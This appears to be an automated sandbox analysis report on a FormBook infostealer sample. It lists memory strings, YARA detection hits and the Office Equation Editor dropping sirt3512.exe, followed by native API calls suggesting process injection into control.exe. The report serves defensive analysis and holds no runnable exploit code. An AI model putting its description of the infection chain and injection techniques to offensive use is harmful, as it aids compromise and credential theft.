Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000006.00000000.2117376322.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: explorer.exe, 00000006.00000000.2110742307.000000000856E000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2103167927.0000000004263000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 00000006.00000000.2110580739.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.2102484793.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 00000006.00000000.2110580739.000000000842E000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 00000006.00000000.2110580739.000000000842E000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1es
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\sirtx[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\sirt3512.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A060 NtClose, 5_2_0041A060
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A110 NtAllocateVirtualMemory, 5_2_0041A110
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00419F30 NtCreateFile, 5_2_00419F30
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00419FE0 NtReadFile, 5_2_00419FE0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A05A NtClose, 5_2_0041A05A
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041A10A NtAllocateVirtualMemory, 5_2_0041A10A
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009300C4 NtCreateFile,LdrInitializeThunk, 5_2_009300C4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00930048
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930078 NtResumeThread,LdrInitializeThunk, 5_2_00930078
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F9F0 NtClose,LdrInitializeThunk, 5_2_0092F9F0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F900 NtReadFile,LdrInitializeThunk, 5_2_0092F900
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0092FAD0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0092FAE8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0092FBB8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0092FB68
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0092FC90
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0092FC60
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0092FD8C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0092FDC0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0092FEA0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0092FED0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0092FFB4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009310D0 NtOpenProcessToken, 5_2_009310D0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930060 NtQuerySection, 5_2_00930060
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009301D4 NtSetValueKey, 5_2_009301D4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093010C NtOpenDirectoryObject, 5_2_0093010C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00931148 NtOpenThread, 5_2_00931148
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009307AC NtCreateMutant, 5_2_009307AC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F8CC NtWaitForSingleObject, 5_2_0092F8CC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00931930 NtSetContextThread, 5_2_00931930
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092F938 NtWriteFile, 5_2_0092F938
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FAB8 NtQueryValueKey, 5_2_0092FAB8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FA20 NtQueryInformationFile, 5_2_0092FA20
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FA50 NtEnumerateValueKey, 5_2_0092FA50
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FBE8 NtQueryVirtualMemory, 5_2_0092FBE8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FB50 NtCreateKey, 5_2_0092FB50
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC30 NtOpenProcess, 5_2_0092FC30
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00930C40 NtGetContextThread, 5_2_00930C40
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FC48 NtSetInformationFile, 5_2_0092FC48
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00931D80 NtSuspendThread, 5_2_00931D80
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FD5C NtEnumerateKey, 5_2_0092FD5C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FE24 NtWriteVirtualMemory, 5_2_0092FE24
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FFFC NtCreateProcessEx, 5_2_0092FFFC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0092FF34 NtQueueApcThread, 5_2_0092FF34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F800C4 NtCreateFile,LdrInitializeThunk, 7_2_01F800C4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F807AC NtCreateMutant,LdrInitializeThunk, 7_2_01F807AC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F9F0 NtClose,LdrInitializeThunk, 7_2_01F7F9F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F900 NtReadFile,LdrInitializeThunk, 7_2_01F7F900
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_01F7FBB8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_01F7FB68
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FB50 NtCreateKey,LdrInitializeThunk, 7_2_01F7FB50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_01F7FAE8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_01F7FAD0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FAB8 NtQueryValueKey,LdrInitializeThunk, 7_2_01F7FAB8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_01F7FDC0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FD8C NtDelayExecution,LdrInitializeThunk, 7_2_01F7FD8C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_01F7FC60
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FFB4 NtCreateSection,LdrInitializeThunk, 7_2_01F7FFB4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_01F7FED0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F801D4 NtSetValueKey, 7_2_01F801D4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F81148 NtOpenThread, 7_2_01F81148
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8010C NtOpenDirectoryObject, 7_2_01F8010C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F810D0 NtOpenProcessToken, 7_2_01F810D0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80078 NtResumeThread, 7_2_01F80078
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80060 NtQuerySection, 7_2_01F80060
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80048 NtProtectVirtualMemory, 7_2_01F80048
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F81930 NtSetContextThread, 7_2_01F81930
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F938 NtWriteFile, 7_2_01F7F938
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7F8CC NtWaitForSingleObject, 7_2_01F7F8CC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FBE8 NtQueryVirtualMemory, 7_2_01F7FBE8
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FA50 NtEnumerateValueKey, 7_2_01F7FA50
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FA20 NtQueryInformationFile, 7_2_01F7FA20
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F81D80 NtSuspendThread, 7_2_01F81D80
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FD5C NtEnumerateKey, 7_2_01F7FD5C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC90 NtUnmapViewOfSection, 7_2_01F7FC90
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F80C40 NtGetContextThread, 7_2_01F80C40
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC48 NtSetInformationFile, 7_2_01F7FC48
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FC30 NtOpenProcess, 7_2_01F7FC30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FFFC NtCreateProcessEx, 7_2_01F7FFFC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FF34 NtQueueApcThread, 7_2_01F7FF34
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FEA0 NtReadVirtualMemory, 7_2_01F7FEA0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F7FE24 NtWriteVirtualMemory, 7_2_01F7FE24
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA060 NtClose, 7_2_000FA060
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA110 NtAllocateVirtualMemory, 7_2_000FA110
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F9F30 NtCreateFile, 7_2_000F9F30
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000F9FE0 NtReadFile, 7_2_000F9FE0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA05A NtClose, 7_2_000FA05A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FA10A NtAllocateVirtualMemory, 7_2_000FA10A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E493EE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 7_2_01E493EE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E49882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 7_2_01E49882
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E493F2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 7_2_01E493F2
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B8D28 4_2_001B8D28
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B2152 4_2_001B2152
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9950 4_2_001B9950
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BA570 4_2_001BA570
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B8968 4_2_001B8968
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B1742 4_2_001B1742
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B5760 4_2_001B5760
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B0FF0 4_2_001B0FF0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BD7F0 4_2_001BD7F0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BB831 4_2_001BB831
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B0470 4_2_001B0470
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9C84 4_2_001B9C84
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BA4FB 4_2_001BA4FB
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B50F9 4_2_001B50F9
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B8D18 4_2_001B8D18
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B5108 4_2_001B5108
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BA532 4_2_001BA532
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B8959 4_2_001B8959
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B5558 4_2_001B5558
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B5548 4_2_001B5548
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9D4E 4_2_001B9D4E
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B914C 4_2_001B914C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9940 4_2_001B9940
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BB170 4_2_001BB170
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B4D6A 4_2_001B4D6A
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9D92 4_2_001B9D92
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BE590 4_2_001BE590
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BB212 4_2_001BB212
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9A35 4_2_001B9A35
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9A50 4_2_001B9A50
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B4A78 4_2_001B4A78
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B3E70 4_2_001B3E70
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B4A68 4_2_001B4A68
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B3E80 4_2_001B3E80
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9ABC 4_2_001B9ABC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B5310 4_2_001B5310
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B5300 4_2_001B5300
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9F30 4_2_001B9F30
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9F20 4_2_001B9F20
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9758 4_2_001B9758
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B9749 4_2_001B9749
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B0F48 4_2_001B0F48
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001B1782 4_2_001B1782
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_001BBFE0 4_2_001BBFE0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00467E44 4_2_00467E44
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00460048 4_2_00460048
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00467870 4_2_00467870
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00467C7C 4_2_00467C7C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00460006 4_2_00460006
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00464408 4_2_00464408
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00464D89 4_2_00464D89
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00464D98 4_2_00464D98
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_004655B4 4_2_004655B4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00463670 4_2_00463670
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00467E95 4_2_00467E95
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00464698 4_2_00464698
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_004646A8 4_2_004646A8
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00467EB3 4_2_00467EB3
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00463752 4_2_00463752
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00464753 4_2_00464753
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00463F08 4_2_00463F08
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00467F16 4_2_00467F16
